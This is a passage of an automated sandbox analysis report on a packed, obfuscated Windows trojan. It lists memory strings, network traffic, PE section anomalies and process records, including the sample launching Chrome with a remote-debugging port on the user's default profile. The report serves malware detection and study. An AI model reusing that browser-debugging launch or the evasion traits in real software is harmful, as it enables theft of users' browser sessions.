Source: chrome.exe, 00000004.00000003.2355311783.000059BC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2355637298.000059BC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000004.00000003.2356116398.000059BC00684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000004.00000003.2356116398.000059BC00684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000004.00000003.2835011469.00001D400171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2833998764.00001D400170C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000004.00000002.4177573063.00001D4000030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4178572640.00001D40001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000004.00000002.4180500187.00001D4000670000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000004.00000002.4181257613.00001D40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4181357128.00001D400080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4183195505.00001D4000C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4179863592.00001D40004D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000004.00000002.4181257613.00001D40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4181357128.00001D400080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4183195505.00001D4000C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4179863592.00001D40004D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000004.00000002.4183341509.00001D4000C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoc_state
Source: chrome.exe, 00000004.00000002.4179761067.00001D4000480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2422993063.00001D40013DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424541070.00001D400140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2423976458.00001D4001324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2422890687.00001D40013D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424233772.00001D4001340000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 00000004.00000003.2422890687.00001D40013D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424233772.00001D4001340000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000004.00000003.2391437793.00001D4001110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000004.00000002.4179863592.00001D40004D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.4182226962.00001D4000A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.4177457082.00001D400000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000004.00000003.2835252440.00001D4001720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2835011469.00001D400171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2836151316.00001D4001724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2833998764.00001D400170C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2836516279.00001D4001728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000004.00000003.2829320985.00001D40014B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000004.00000002.4178653959.00001D400020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.4178653959.00001D400020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.4178653959.00001D400020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.4178653959.00001D400020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.4185556268.00001D40010D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000004.00000002.4185556268.00001D40010D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000004.00000002.4182971884.00001D4000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4179863592.00001D40004D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000003.2423976458.00001D4001324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424233772.00001D4001340000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000004.00000002.4186218907.00001D4001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2423239990.00001D4001398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424541070.00001D400140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2423976458.00001D4001324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424233772.00001D4001340000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000004.00000003.2423976458.00001D4001324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2422890687.00001D40013D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424233772.00001D4001340000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000004.00000003.2423976458.00001D4001324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2422890687.00001D40013D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2424233772.00001D4001340000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4178816616.00001D4000298000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:50020 version: TLS 1.2

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0143E5EE 0_3_0143E5EE
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: hkkquiln ZLIB complexity 0.9942651269920318
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.evad.winEXE@24/14@18/7
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.4181034891.00001D4000761000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,6816261580910516305,6036598587685662932,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,6816261580910516305,6036598587685662932,262144 /prefetch:8 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: file.exe Static file information: File size 4400640 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of hkkquiln is bigger than: 0x100000 < 0x1b7400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.230000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hkkquiln:EW;xxvbrqle:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;hkkquiln:EW;xxvbrqle:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x43d83f should be: 0x440bef
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: hkkquiln
Source: file.exe Static PE information: section name: xxvbrqle
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B7EE0 push dword ptr [eax+04h]; ret 0_2_005B7F0F
Source: file.exe Static PE information: section name: hkkquiln entropy: 7.954834567912499

Boot Survival

